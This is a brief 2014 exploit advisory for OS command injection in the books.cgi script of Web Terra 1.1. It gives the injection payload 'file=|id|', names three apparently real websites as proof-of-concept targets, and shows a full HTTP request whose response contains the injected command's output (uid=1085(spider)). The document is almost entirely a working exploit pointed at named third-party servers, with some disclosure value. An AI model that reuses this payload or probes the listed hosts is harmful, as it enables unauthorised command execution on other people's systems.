[+] Remote Comand Execution on books.cgi Web Terra v. 1.1 [+] Date: 21/05/2014 [+] CWE number: CWE-78 [+] Risk: High [+] Author: Felipe Andrian Peixoto [+] Contact: felipe_andrian@hotmail.com [+] Tested on: Windows 7 and Linux [+] Vendor Homepage: http://www2.inforyoma.or.jp/~terra [+] Vulnerable File: books.cgi [+] Version : 1.1 [+] Exploit: http://host/patch/books.cgi?file=|id| [+] PoC: http://redsuns.x0.com/webnovel/books.cgi?file=|id| http://home.kinet.or.jp/yama/cgi-bin/books/books.cgi?file=|id| http://www2.pos.to/~fuyumi/tomonokai/cgi-bin/books.cgi?file=|id| [+] Example Request: GET /webnovel/books.cgi?file=|id| HTTP/1.1 Host: redsuns.x0.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive HTTP/1.1 200 OK Date: Wed, 21 May 2014 18:59:05 GMT Server: Apache/1.3.42 (Unix) Connection: close Content-Type: text/html Content-Length: 498


| ??M?? || ?????? || ?ύX? || ????? |


uid=1085(spider) gid=1000(users) groups=1000(users) [+] More About : http://cwe.mitre.org/data/definitions/78.html